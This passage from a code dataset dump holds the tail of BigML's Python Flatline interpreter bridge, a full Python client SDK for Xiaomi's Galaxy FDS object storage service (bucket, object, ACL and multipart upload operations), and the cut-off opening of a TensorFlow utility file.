\"\"\"A bridge to an underlying nodejs Flatline interpreter.\n\n This class uses JSPyBridge to launch a Nodejs interpreter that loads\n Flatline's javascript implementation and allows interaction via\n Python constructs.\n\n Example:\n\n Flatline.check_lisp('(+ 1 2)')\n Flatline.check_json([\"f\", 0], dataset=dataset)\n\n \"\"\"\n\n __FLATLINEJS = 
require('./flatline/flatline-node.js')\n    interpreter = __FLATLINEJS.bigml.dixie.flatline\n\n    #pylint: disable=locally-disabled,invalid-name\n    @staticmethod\n    def infer_fields(row, prefix=None, offset=None):\n        \"\"\"Utility function generating a mock list of fields.\n\n        Usually, checks and applications of Flatline expressions run\n        in the context of a given dataset's field descriptors, but\n        during testing it's useful sometimes to provide a mock set of\n        them, based on the types of the values of the test input rows.\n\n        Example:\n\n            In[1]: Flatline.infer_fields([0, 'a label'])\n            Out[1]: [{'column_number': 0,\n                      'datatype': 'int64',\n                      'id': '000000',\n                      'optype': 'numeric'},\n                     {'column_number': 1,\n                      'datatype': 'string',\n                      'id': '000001',\n                      'optype': 'categorical'}]\n\n        \"\"\"\n        result = []\n        id_ = 0\n        for v in row:\n            t = type(v)\n            optype = 'categorical'\n            datatype = 'string'\n            if (t is int or t is float):\n                optype = 'numeric'\n                if t is float:\n                    datatype = 'float64'\n                else:\n                    datatype = 'int64'\n            id_str = '%06x' % id_\n            if prefix:\n                length = len(prefix)\n                id_str = prefix + id_str[length:]\n            column = id_\n            if offset:\n                column = offset + id_\n            result.append({'id': id_str,\n                           'optype':optype,\n                           'datatype': datatype,\n                           'column_number': column})\n            id_ = id_ + 1\n        return result\n\n    @staticmethod\n    def _dataset(dataset, rows):\n        \"\"\"The dataset argument should be a Dataset that contains the\n        in_fields information\n        \"\"\"\n        try:\n            return {\"fields\": dataset.in_fields}\n        except AttributeError:\n            if len(rows) > 0:\n                return {'fields': Flatline.infer_fields(rows[0])}\n        return None\n\n    @staticmethod\n    def defined_functions():\n        \"\"\"A list of the names of all defined Flatline functions\"\"\"\n        return Flatline.interpreter.defined_primitives\n\n    @staticmethod\n    def check_lisp(sexp, fields=None):\n        \"\"\"Checks whether the given lisp s-expression is valid.\n\n        Any operations referring to a dataset's fields will use the\n        information found in fields structure.\n\n        \"\"\"\n        r = Flatline.interpreter.evaluate_sexp(sexp, fields, True).valueOf()\n        return r\n\n    @staticmethod\n    def check_json(json_sexp, fields=None):\n        \"\"\"Checks whether the given JSON s-expression is valid.\n\n        Works like `check_lisp` (which see), but taking a JSON\n        expression represented as a native Python list instead of a\n        Lisp sexp string.\n\n        \"\"\"\n        r = Flatline.interpreter.evaluate_js(json_sexp, fields).valueOf()\n        return r\n\n    @staticmethod\n    def lisp_to_json(sexp):\n        \"\"\" Auxiliary function transforming Lisp to Python representation.\"\"\"\n        return Flatline.interpreter.sexp_to_js(sexp)\n\n    @staticmethod\n    def json_to_lisp(json_sexp):\n        \"\"\" Auxiliary function transforming Python to Lisp representation.\"\"\"\n        return Flatline.interpreter.js_to_sexp(json_sexp)\n\n    @staticmethod\n    def apply_lisp(sexp, rows, dataset=None):\n        \"\"\"Applies the given Lisp sexp to a set of input rows.\n\n        Input rows are represented as a list of lists of native Python\n        values. The dataset info should be provided as a Dataset object.\n        If no dataset is provided, the field characteristics\n        of the input rows are guessed using `infer_fields`.\n\n        \"\"\"\n        return Flatline.interpreter.eval_and_apply_sexp(\n            sexp,\n            Flatline._dataset(dataset, rows),\n            rows)\n\n    @staticmethod\n    def apply_json(json_sexp, rows, dataset=None):\n        \"\"\"Applies the given JSON sexp to a set of input rows.\n\n        As usual, JSON sexps are represented as Python lists,\n        e.g. [\"+\", 1, 2].\n\n        Input rows are represented as a list of lists of native Python\n        values. 
The dataset info should be provided as a Dataset object.\n If no dataset is provided, the field characteristics\n of the input rows are guessed using `infer_fields`.\n\n \"\"\"\n return Flatline.interpreter.eval_and_apply_js(\n json_sexp,\n Flatline._dataset(dataset, rows),\n rows)\n","repo_name":"bigmlcom/python","sub_path":"bigml/flatline.py","file_name":"flatline.py","file_ext":"py","file_size_in_byte":5050,"program_lang":"python","lang":"en","doc_type":"code","stars":272,"dataset":"github-code","pt":"40"} +{"seq_id":"30340831122","text":"import json\nimport hashlib\nfrom urllib.parse import quote\n\nimport requests\n\nfrom .auth.common import Common\nfrom .auth.signature.signer import Signer\nfrom .fds_client_configuration import FDSClientConfiguration\nfrom .fds_request import FDSRequest\nfrom .galaxy_fds_client_exception import GalaxyFDSClientException\nfrom .model.access_control_policy import AccessControlPolicy\nfrom .model.fds_bucket import FDSBucket\nfrom .model.fds_object import FDSObject\nfrom .model.fds_object_listing import FDSObjectListing\nfrom .model.fds_object_metadata import FDSObjectMetadata\nfrom .model.fds_object_summary import FDSObjectSummary\nfrom .model.permission import AccessControlList, UserGroups, Permission, \\\n GrantType\nfrom .model.permission import Grant\nfrom .model.permission import Grantee\nfrom .model.permission import Owner\nfrom .model.put_object_result import PutObjectResult\nfrom .model.subresource import SubResource\nfrom .model.init_multipart_upload_result import InitMultipartUploadResult\nfrom .model.upload_part_result import UploadPartResult\nimport os\nimport sys\nfrom . import utils\n\nclass GalaxyFDSClient(object):\n '''\n Client for Galaxy FDS Service.\n '''\n\n def __init__(self, access_key=None, access_secret=None, config=None):\n '''\n :param access_key: The app access key\n :param access_secret: The app access secret\n :param config: The FDS service's config\n '''\n self._delimiter = \"/\"\n\n if access_key == None or access_secret == None:\n # Get keys from environment variables\n if \"XIAOMI_ACCESS_KEY\" in os.environ and \"XIAOMI_SECRET_KEY\" in os.environ:\n self._access_key = os.environ[\"XIAOMI_ACCESS_KEY\"]\n self._secret_key = os.environ[\"XIAOMI_SECRET_KEY\"]\n else:\n # Read keys from configuration file\n config_filename = os.path.join(\n os.path.expanduser('~'), \".config/xiaomi/config\")\n if os.path.exists(config_filename):\n with open(config_filename) as f:\n data = json.load(f)\n self._access_key = data[\"access_key\"]\n self._secret_key = data[\"secret_key\"]\n else:\n self._access_key = access_key\n self._secret_key = access_secret\n\n self._auth = Signer(self._access_key, self._secret_key)\n if config == None:\n config = FDSClientConfiguration()\n if \"FDS_ENDPOINT\" in os.environ:\n config.set_endpoint(os.environ[\"FDS_ENDPOINT\"])\n self._config = config\n self._request = FDSRequest(config.timeout, config.max_retries)\n\n @property\n def delimiter(self):\n return self._delimiter\n\n @delimiter.setter\n def delimiter(self, delimiter):\n self._delimiter = delimiter\n\n def does_bucket_exist(self, bucket_name):\n '''\n Check the existence of a specified bucket.\n :param bucket_name: The bucket name of the bucket to check\n :return: True if the bucket exists, otherwise False\n '''\n uri = '%s%s' % (self._config.get_base_uri(), bucket_name)\n response = self._request.head(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n return True\n elif response.status_code == requests.codes.not_found:\n return 
False\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Check bucket existence failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def list_buckets(self):\n '''\n List all the buckets of the current developer.\n :return: A list of FDSBucket which contains name and owner of the bucket.\n '''\n uri = self._config.get_base_uri()\n response = self._request.get(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'List buckets failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n elif response.content:\n buckets_list = []\n json_response = json.loads(response.content.decode('utf-8'))\n buckets = json_response['buckets']\n owner = Owner().from_json(json_response['owner'])\n for bucket in buckets:\n buckets_list.append(FDSBucket(bucket['name'], owner))\n return buckets_list\n else:\n return list()\n\n def create_bucket(self, bucket_name):\n '''\n Create a bucket with the specified name.\n :param bucket_name: The name of the bucket to create\n '''\n uri = '%s%s' % (self._config.get_base_uri(), bucket_name)\n response = self._request.put(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Create bucket failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def delete_bucket(self, bucket_name):\n '''\n Delete a bucket of a specified name.\n :param bucket_name: The name of the bucket to delete\n '''\n uri = '%s%s' % (self._config.get_base_uri(), bucket_name)\n response = self._request.delete(uri, auth=self._auth)\n if (response.status_code != requests.codes.ok and\n response.status_code != requests.codes.not_found):\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Delete bucket failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def list_objects(self, bucket_name, prefix = '', delimiter = None):\n '''\n List all objects in a specified bucket with prefix. If the number of objects\n in the bucket is larger than a threshold, you would get a FDSObjectListing\n contains no FDSObjects. 
In this scenario, you should call\n list_next_batch_of_objects with the returned value\n :param bucket_name: The name of the bucket to whom the object is put\n :param prefix: The prefix of the object to list\n :param delimiter: The delimiter used in listing, using '/' if 'None' given\n :return: FDSObjectListing contains FDSObject list and other metadata\n '''\n if delimiter is None:\n delimiter = self._delimiter\n uri = '%s%s?prefix=%s&delimiter=%s' % \\\n (self._config.get_base_uri(), bucket_name, prefix, delimiter)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n objects_list = FDSObjectListing(json.loads(response.content.decode('utf-8')))\n return objects_list\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'List objects under bucket %s with prefix %s failed, ' \\\n 'status=%s, reason=%s%s' % \\\n (bucket_name, prefix, response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def list_trash_objects(self, prefix = '', delimiter = None):\n '''\n Compared with list_objects, it returns a list of objects in the trash.\n :param prefix: The prefix of bucket_name/object_name.\n :param delimiter: The delimiter used in listing, using '/' if 'None' given.\n :return: FDSObjectListing contains a list of objects in the trash.\n '''\n return self.list_objects(\"trash\", prefix, delimiter);\n\n def list_next_batch_of_objects(self, previous):\n '''\n List objects in a iterative manner\n :param previous: The FDSObjectListing returned by previous call or list_objects\n :return: FDSObjectListing contains FDSObject list and other metadata, 'None'\n if all objects returned by previous calls\n '''\n if not previous.is_truncated:\n return None\n bucket_name = previous.bucket_name\n prefix = previous.prefix\n delimiter = previous.delimiter\n marker = previous.next_marker\n uri = \"%s%s?prefix=%s&delimiter=%s&marker=%s\" % \\\n (self._config.get_base_uri(), bucket_name, prefix, delimiter, marker)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n objects_list = FDSObjectListing(json.loads(response.content))\n return objects_list\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'List next batch of objects under bucket %s with prefix %s ' \\\n 'and marker %s failed, status=%s, reason=%s%s' % \\\n (bucket_name, prefix, marker, response.status_code, response.content,\n headers)\n raise GalaxyFDSClientException(message)\n\n def put_object_with_uri(self, uri, data, metadata=None):\n '''\n Put the object with the uri.\n :param uri: The uri of th bucket and object\n :param data: The data to put, bytes or a file like object\n :param metadata: The metadata of the object\n :return: The result of putting action server returns\n '''\n bucket_name, object_name = utils.uri_to_bucket_and_object(uri)\n self.put_object(bucket_name, object_name, data, metadata)\n\n def put_object(self, bucket_name, object_name, data, metadata=None):\n '''\n Put the object to a specified bucket. 
If an object with the same name already\n    exists, it will be overwritten.\n    :param bucket_name: The name of the bucket to whom the object is put\n    :param object_name: The name of the object to put\n    :param data: The data to put, bytes or a file like object\n    :param metadata: The metadata of the object\n    :return: The result of the put action the server returns\n    '''\n    uri = '%s%s/%s' % (self._config.get_upload_base_uri(), bucket_name,\n      object_name)\n    if metadata is None:\n      metadata = FDSObjectMetadata()\n    if self._config.enable_md5_calculate:\n      digest = hashlib.md5()\n      digest.update(data)\n      metadata.add_header(Common.CONTENT_MD5,digest.hexdigest())\n\n    response = self._request.put(uri, data=data, auth=self._auth,\n      headers=metadata.metadata)\n    if response.status_code == requests.codes.ok:\n      return PutObjectResult(json.loads(response.content.decode('utf-8')))\n    headers = \"\"\n    if self._config.debug:\n      headers = ' header=%s' % response.headers\n    message = 'Put object failed, status=%s, reason=%s%s' % (\n      response.status_code, response.content, headers)\n    raise GalaxyFDSClientException(message)\n\n  def post_object(self, bucket_name, data, metadata=None):\n    '''\n    Post the object to a specified bucket. The object name will be generated\n    by the server uniquely.\n    :param bucket_name: The name of the bucket to whom the object is put\n    :param data: The data to put, bytes or a file like object\n    :param metadata: The metadata of the object\n    :return: The result of the post action the server returns\n    '''\n    uri = '%s%s/' % (self._config.get_upload_base_uri(), bucket_name)\n    if metadata is None:\n      metadata = FDSObjectMetadata()\n    if self._config.enable_md5_calculate:\n      digest = hashlib.md5()\n      digest.update(data)\n      metadata.add_header(Common.CONTENT_MD5,digest.hexdigest())\n\n    response = self._request.post(uri, data=data, auth=self._auth,\n      headers=metadata.metadata)\n    if response.status_code == requests.codes.ok:\n      return PutObjectResult(json.loads(response.content))\n    headers = \"\"\n    if self._config.debug:\n      headers = ' header=%s' % response.headers\n    message = 'Post object failed, status=%s, reason=%s%s' % (\n      response.status_code, response.content, headers)\n    raise GalaxyFDSClientException(message)\n\n  def get_object_with_uri(self, uri, position=0, size=4096):\n    '''\n    Get a specified object from an FDS uri.\n    :param uri: The uri of the bucket and object\n    :param position: The start index of object to get\n    :param size: The maximum size of each piece when return streaming is on\n    :return: The FDS object\n    '''\n    bucket_name, object_name = utils.uri_to_bucket_and_object(uri)\n    return self.get_object(bucket_name, object_name, position, size)\n\n  def get_object(self, bucket_name, object_name, position=0, size=4096):\n    '''\n    Get a specified object from a bucket.\n    :param bucket_name: The name of the bucket from whom to get the object\n    :param object_name: The name of the object to get\n    :param position: The start index of object to get\n    :param size: The maximum size of each piece when return streaming is on\n    :return: The FDS object\n    '''\n    if position < 0:\n      raise GalaxyFDSClientException(\"Seek position should be no less than 0\")\n    uri = '%s%s/%s' % (self._config.get_download_base_uri(), bucket_name,\n      object_name)\n    if position > 0:\n      header = {Common.RANGE : 'bytes=%d-' % position}\n      response = self._request.get(uri, auth=self._auth, headers=header)\n    else:\n      response = self._request.get(uri, auth=self._auth)\n    if response.status_code == requests.codes.ok or \\\n        response.status_code == 
requests.codes.partial:\n      obj = FDSObject()\n      obj.stream = response.iter_content(chunk_size=size)\n      summary = FDSObjectSummary()\n      summary.bucket_name = bucket_name\n      summary.object_name = object_name\n      summary.size = int(response.headers['content-length'])\n      obj.summary = summary\n      obj.metadata = self._parse_object_metadata_from_headers(response.headers)\n      return obj\n    else:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' header=%s' % response.headers\n      message = 'Get object failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def download_object_with_uri(self, uri, data_file, offset=0, length=-1):\n    bucket_name, object_name = utils.uri_to_bucket_and_object(uri)\n    self.download_object(bucket_name, object_name, data_file, offset, length)\n\n  def download_object(self, bucket_name, object_name, data_file, offset=0, length=-1):\n    fds_object = self.get_object(bucket_name=bucket_name,\n                                 object_name=object_name,\n                                 position=offset)\n    length_left = length\n    if length_left == -1:\n      length_left = sys.maxsize\n    try:\n      if data_file:\n        with open(data_file, \"w\") as f:\n          for chunk in fds_object.stream:\n            l = min(length_left, len(chunk))\n            f.write(chunk[0:l].decode('utf-8'))\n            length_left -= l\n            if length_left <= 0:\n              break\n      else:\n        for chunk in fds_object.stream:\n          l = min(length_left, len(chunk))\n          sys.stdout.write(chunk[0:l])\n          length_left -= l\n          if length_left <= 0:\n            break\n    finally:\n      fds_object.stream.close()\n\n  def does_object_exists(self, bucket_name, object_name):\n    '''\n    Check the existence of a specified object.\n    :param bucket_name: The name of the bucket\n    :param object_name: The name of the object to check\n    :return: True if the object exists, otherwise False\n    '''\n    uri = '%s%s/%s' % (self._config.get_base_uri(), bucket_name, object_name)\n    response = self._request.head(uri, auth=self._auth)\n    if response.status_code == requests.codes.ok:\n      return True\n    elif response.status_code == requests.codes.not_found:\n      return False\n    else:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' header=%s' % response.headers\n      message = 'Check object existence failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def delete_object(self, bucket_name, object_name):\n    '''\n    Delete the specified object.\n    :param bucket_name: The name of the bucket\n    :param object_name: The name of the object\n    '''\n    uri = '%s%s/%s' % (self._config.get_base_uri(), bucket_name, object_name)\n    response = self._request.delete(uri, auth=self._auth)\n    if response.status_code != requests.codes.ok:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' header=%s' % response.headers\n      message = 'Delete object failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def restore_object(self, bucket_name, object_name):\n    '''\n    Restore a specified object from trash.\n    :param bucket_name: The name of the bucket\n    :param object_name: The name of the object\n    '''\n    uri = '%s%s/%s?restore=' % (self._config.get_base_uri(),\n      bucket_name, object_name)\n    response = self._request.put(uri, auth=self._auth)\n    if response.status_code != requests.codes.ok:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' header=%s' % response.headers\n      message = 'Restore object failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def 
rename_object(self, bucket_name, src_object_name, dst_object_name):\n '''\n Rename a specified object to a new name.\n :param bucket_name: The name of the bucket\n :param src_object_name: The original name of the object\n :param dst_object_name: The target name of the object to rename to\n '''\n uri = '%s%s/%s?renameTo=%s' % (self._config.get_base_uri(),\n bucket_name, src_object_name, dst_object_name)\n response = self._request.put(uri, auth=self._auth)\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Rename object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def set_bucket_acl(self, bucket_name, acl):\n '''\n Add grant(ACL) for specified bucket.\n :param bucket_name: The name of the bucket to add grant\n :param acl: The grant(ACL) to add\n '''\n uri = '%s%s?%s' % (self._config.get_base_uri(), bucket_name,\n SubResource.ACL)\n acp = self._acl_to_acp(acl)\n response = self._request.put(uri, auth=self._auth, data=json.dumps(acp,\n default=lambda x : x.to_string()))\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Set bucket acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_bucket_acl(self, bucket_name):\n '''\n Get the ACL of a specified bucket.\n :param bucket_name: The name of the bucket to get ACL\n :return: The got access control list\n '''\n uri = '%s%s?%s' % (self._config.get_base_uri(), bucket_name,\n SubResource.ACL)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n acp = AccessControlPolicy(json.loads(response.content))\n acl = self._acp_to_acl(acp)\n return acl\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Get bucket acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def set_object_acl(self, bucket_name, object_name, acl):\n '''\n Add grant(ACL) for a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :param acl: The grant(ACL) to add\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, SubResource.ACL)\n acp = self._acl_to_acp(acl)\n response = self._request.put(uri, auth=self._auth, data=json.dumps(acp,\n default=lambda x : x.to_string()))\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Set object acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_object_acl(self, bucket_name, object_name):\n '''\n Get the ACL of a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: The got access control list\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, SubResource.ACL)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n acp = AccessControlPolicy(json.loads(response.content))\n acl = self._acp_to_acl(acp)\n return acl\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' 
header=%s' % response.headers\n message = 'Get object acl failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def get_object_metadata(self, bucket_name, object_name):\n '''\n Get the metadata of a specified object.\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: The got object metadata\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name,\n SubResource.METADATA)\n response = self._request.get(uri, auth=self._auth)\n if response.status_code == requests.codes.ok:\n metadata = self._parse_object_metadata_from_headers(response.headers)\n return metadata\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Get object metadata failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def prefetch_object(self, bucket_name, object_name):\n '''\n Prefetch the object to CDN\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: void\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"prefetch\")\n response = self._request.put(uri, auth=self._auth, data=\"\")\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Prefetch object failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def refresh_object(self, bucket_name, object_name):\n '''\n Refresh the cache of the object in CDN\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :return: void\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"refresh\")\n response = self._request.put(uri, auth=self._auth, data=\"\")\n if response.status_code != requests.codes.ok:\n headers = \"\"\n if self._config.debug:\n headers = ' header=%s' % response.headers\n message = 'Refresh object failed, status=%s, reason=%s%s' %(\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def set_public(self, bucket_name, object_name):\n acl = AccessControlList()\n grant = Grant(Grantee(UserGroups.ALL_USERS), Permission.READ)\n grant.type = GrantType.GROUP\n acl.add_grant(grant)\n self.set_object_acl(bucket_name, object_name, acl)\n\n def init_multipart_upload(self, bucket_name, object_name):\n '''\n Init a multipart upload session\n :param bucket_name:\n :param object_name:\n :return:\n '''\n uri = '%s%s/%s?%s' % (\n self._config.get_base_uri(), bucket_name, object_name, \"uploads\")\n response = self._request.put(uri, auth=self._auth, data=\"\")\n if response.status_code == requests.codes.ok:\n result = InitMultipartUploadResult(json.loads(response.content))\n return result\n else:\n headers = \"\"\n if self._config.debug:\n headers = ' headers=%s' % response.headers\n message = 'Init multipart upload failed, status=%s, reason=%s%s' % (\n response.status_code, response.content, headers)\n raise GalaxyFDSClientException(message)\n\n def upload_part(self, bucket_name, object_name, upload_id, part_number, data):\n '''\n Upload a multipart upload part\n :param bucket_name:\n :param object_name:\n :param upload_id:\n :param part_number:\n :param data:\n :return:\n '''\n uri = '%s%s/%s?%s%s' % (\n 
self._config.get_base_uri(), bucket_name, object_name, \"uploadId=\" +\n      upload_id, \"&partNumber=\" + str(part_number))\n    response = self._request.put(uri, auth=self._auth, data=data)\n    if response.status_code == requests.codes.ok:\n      result = UploadPartResult(json.loads(response.content))\n      return result\n    else:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' headers=%s' % response.headers\n      message = 'Upload part failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def complete_multipart_upload(self, bucket_name, object_name, upload_id,\n    metadata, upload_part_result_list):\n    '''\n    Complete a multipart upload\n    :param bucket_name:\n    :param object_name:\n    :param upload_id:\n    :param metadata:\n    :param upload_part_result_list:\n    :return:\n    '''\n    uri = '%s%s/%s?%s' % (\n      self._config.get_base_uri(), bucket_name, object_name, \"uploadId=\" +\n      upload_id)\n    if metadata is None:\n      metadata = FDSObjectMetadata()\n    response = self._request.put(uri, auth=self._auth,\n      data=upload_part_result_list, headers=metadata.metadata)\n    if response.status_code == requests.codes.ok:\n      result = PutObjectResult(json.loads(response.content))\n      return result\n    else:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' headers=%s' % response.headers\n      message = 'Complete multipart upload failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def abort_multipart_upload(self, bucket_name, object_name, upload_id):\n    '''\n    Abort a multipart upload\n    :param bucket_name:\n    :param object_name:\n    :param upload_id:\n    :return:\n    '''\n    uri = '%s%s/%s?%s' % (\n      self._config.get_base_uri(), bucket_name, object_name, \"uploadId=\" +\n      upload_id)\n    response = self._request.put(uri, auth=self._auth, data='')\n    if response.status_code != requests.codes.ok:\n      headers = \"\"\n      if self._config.debug:\n        headers = ' headers=%s' % response.headers\n      message = 'Abort multipart upload failed, status=%s, reason=%s%s' % (\n        response.status_code, response.content, headers)\n      raise GalaxyFDSClientException(message)\n\n  def generate_presigned_uri(self, base_uri, bucket_name, object_name,\n    expiration, http_method = \"GET\", content_type = None):\n    '''\n    Generate a pre-signed uri to share object with the public\n    :param base_uri: The base uri of rest server. 
Use client's default if 'None' pass\n :param bucket_name: The name of the bucket\n :param object_name: The name of the object\n :param expiration: The expiration time of the uri: milliseconds from the Epoch\n :param http_method: The http method used in uri\n :return: The pre-signed uri string\n '''\n if not base_uri or base_uri == '':\n if http_method == 'PUT' or http_method == 'POST':\n base_uri = self._config.get_upload_base_uri()\n elif http_method == 'DELETE':\n base_uri = self._config.get_base_uri()\n else:\n base_uri = self._config.get_download_base_uri()\n try:\n uri = '%s%s/%s?%s=%s&%s=%s&' % \\\n (base_uri, bucket_name, object_name, \\\n Common.GALAXY_ACCESS_KEY_ID, self._auth._app_key, \\\n Common.EXPIRES, str(int(expiration)))\n headers = None\n if content_type != None and isinstance(content_type, str):\n headers = {Common.CONTENT_TYPE: content_type}\n signature = self._auth._sign_to_base64(http_method, headers, uri, \\\n self._auth._app_secret).decode('utf-8')\n return '%s%s/%s?%s=%s&%s=%s&%s=%s' % \\\n (base_uri, quote(bucket_name), quote(object_name), \\\n Common.GALAXY_ACCESS_KEY_ID, self._auth._app_key, \\\n Common.EXPIRES, str(int(expiration)), Common.SIGNATURE, signature)\n except Exception as e:\n message = 'Wrong expiration given. ' \\\n 'Milliseconds since January 1, 1970 should be used. ' + str(e)\n raise GalaxyFDSClientException(message)\n\n def generate_download_object_uri(self, bucket_name, object_name):\n '''\n Generate a URI for downloading object\n '''\n return '%s%s/%s' % (self._config.get_download_base_uri(), bucket_name,\n object_name)\n\n def _acp_to_acl(self, acp):\n '''\n Translate AccessControlPolicy to AccessControlList.\n '''\n if acp is not None:\n acl = AccessControlList()\n for item in acp['accessControlList']:\n grantee = item['grantee']\n grant_id = grantee['id']\n permission = item['permission']\n g = Grant(Grantee(grant_id), permission)\n acl.add_grant(g)\n return acl\n return str()\n\n def _acl_to_acp(self, acl):\n '''\n Translate AccessControlList to AccessControlPolicy.\n '''\n if acl is not None:\n acp = AccessControlPolicy(None)\n owner = Owner()\n owner.id = self._access_key\n acp.owner = owner\n acp.access_control_list = acl.get_grant_list()\n return acp\n return ''\n\n def _parse_object_metadata_from_headers(self, response_headers):\n '''\n Parse object metadata from the response headers.\n '''\n metadata = FDSObjectMetadata()\n header_keys = [c.lower() for c in list(response_headers.keys())];\n for key in FDSObjectMetadata.PRE_DEFINED_METADATA:\n if key.lower() in header_keys:\n metadata.add_header(key, response_headers[key])\n for key in response_headers:\n if key.lower().startswith(FDSObjectMetadata.USER_DEFINED_METADATA_PREFIX):\n metadata.add_user_metadata(key, response_headers[key])\n return metadata\n","repo_name":"sh4wn/galaxy-fds-sdk-python","sub_path":"fds/galaxy_fds_client.py","file_name":"galaxy_fds_client.py","file_ext":"py","file_size_in_byte":30455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"39934013941","text":"# This file contains common functions for data processing independent of the dataset and model used.\r\n# Not all of these functions are required to be used in the project\r\nimport tensorflow as tf\r\nimport config\r\n\r\n# Loading Tensorboard Logging dir and file\r\nlog_dir = config.LOG_DIR\r\nlog_file = config.LOG_FILE\r\nmodel_name = config.MODEL_NAME\r\n\r\n# ------- THE FUNCTIONS BELOW ARE USED IN THIS PROJECT ------- #\r\ntensorboard_callback = 
